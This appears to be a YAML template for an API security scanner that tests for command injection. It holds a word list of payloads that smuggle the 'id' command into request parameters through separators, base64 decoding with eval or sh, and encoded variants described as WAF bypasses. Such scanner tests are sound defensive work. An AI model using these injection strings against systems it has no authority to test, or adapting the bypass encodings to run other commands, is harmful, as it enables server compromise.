---
id: COMMAND_INJECTION_BASE64_BYPASS
info:
  name: "Command Injection - Base64 Encoding Bypass"
  description: "Tests whether the application is vulnerable to command injection through base64-encoded payloads that bypass input validation."
  details: "This test injects base64-encoded command execution payloads to check if the application decodes and executes them, indicating a command injection vulnerability."
  impact: "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, potentially leading to complete system compromise, unauthorized data access, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_BASE64_BYPASS
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://twitter.com/trbughunters/status/1283133356922884096"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys
          value:
            extract: bodyValue
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys
          value:
            regex: .*
            extract: queryValue

wordLists:
  # Combined payloads: Base64 encoded + CloudFront WAF bypass
  commandInjectionPayloads:
    # Base64 encoded payloads
    - 'eval "$(echo "aWQgJiYgaWQ=" | base64 --decode)"'
    - 'eval "$(echo "aWQ=" | base64 --decode)"'
    - 'echo "aWQgJiYgaWQ=" | base64 --decode | sh'
    # CloudFront WAF bypass command injection payloads
    - 'id;id'
    - 'id&&id'
    - 'id||id'
    - 'id|id'
    - 'id%26%26id'
    - 'id%7C%7Cid'
    - 'id%7Cid'
    - 'id%3Bid'
    - 'id%20%26%26%20id'
    - 'id%20%7C%7C%20id'
    - 'id%20%7C%20id'
    - 'id%20%3B%20id'
    - '$(id)'
    - '`id`'
    - '${IFS}id'
    - 'id${IFS}&&${IFS}id'
    - 'id${IFS}||${IFS}id'
    - 'id${IFS};${IFS}id'
    - 'id${IFS}|${IFS}id'
    - 'id%00&&id'
    - 'id%00||id'
    - 'id%00;id'
    - 'id%00|id'
    - 'id%09&&id'
    - 'id%0a&&id'
    - 'id%0d&&id'
    - 'id%0a%0d&&id'
    - 'id%2526%2526id'
    - 'id%257c%257cid'
    - 'id%253bid'
    - 'id%257cid'

execute:
  type: single
  requests:
    - req:
        - modify_body_param:
            ${bodyKeys}: "${commandInjectionPayloads}"
        - modify_query_param:
            ${queryKeys}: "${commandInjectionPayloads}"

validate:
  response_payload:
    length:
      gt: 0
    contains_all:
      - "uid="
      - "gid="
      - "groups="
    not_contains:
      - Error
      - Internal Server
      - <html>
      - </html>
